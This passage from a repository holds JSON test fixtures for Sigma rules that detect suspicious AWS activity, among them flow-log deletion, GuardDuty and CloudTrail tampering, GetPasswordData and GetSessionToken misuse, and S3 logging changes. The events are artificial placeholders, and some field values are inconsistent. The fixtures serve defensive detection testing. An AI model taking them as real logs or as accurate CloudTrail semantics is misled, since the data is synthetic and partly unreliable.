8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": 
"arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "CreateRoute", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateRoute", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | 
"eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_deleteflowlogs_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "DeleteFlowLogs", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": 
"ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteFlowLogs", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_guardduty_disruption_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "guardduty.amazonaws.com", 27 | "eventName": "CreateIPSet", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | 
"readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateIPSet", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_getpassworddate_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": 
"AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "GetPasswordData", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "GetPasswordData", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | 
"recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_dbcluster_actions_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "rds.amazonaws.com", 27 | "eventName": "ModifyDBCluster", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | 
"accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "ModifyDBCluster", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_sts_getsessiontoken_misuse_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "IAMUser", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "sts.amazonaws.com", 27 | "eventName": "GetSessionToken", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": 
"2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "GetSessionToken", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_attachpolicy_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | 
"sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "iam.amazonaws.com", 27 | "eventName": "AttachUserPolicy", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "AttachUserPolicy", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": 
"AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_import_key_pair_activity_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "ImportKeyPair", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": 
"arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "ImportKeyPair", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_eks_cluster_created_or_deleted_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "eks.amazonaws.com", 27 | "eventName": "CreateCluster", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | 
"requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateCluster", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_puteventselectors_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | 
"accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "cloudtrail.amazonaws.com", 27 | "eventName": "PutEventSelectors", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "s3.amazonaws.com", 67 | "eventName": "PutEventSelectors", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": 
"2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_s3_data_management_tampering_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "s3.amazonaws.com", 27 | "eventName": "PutBucketLogging", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": 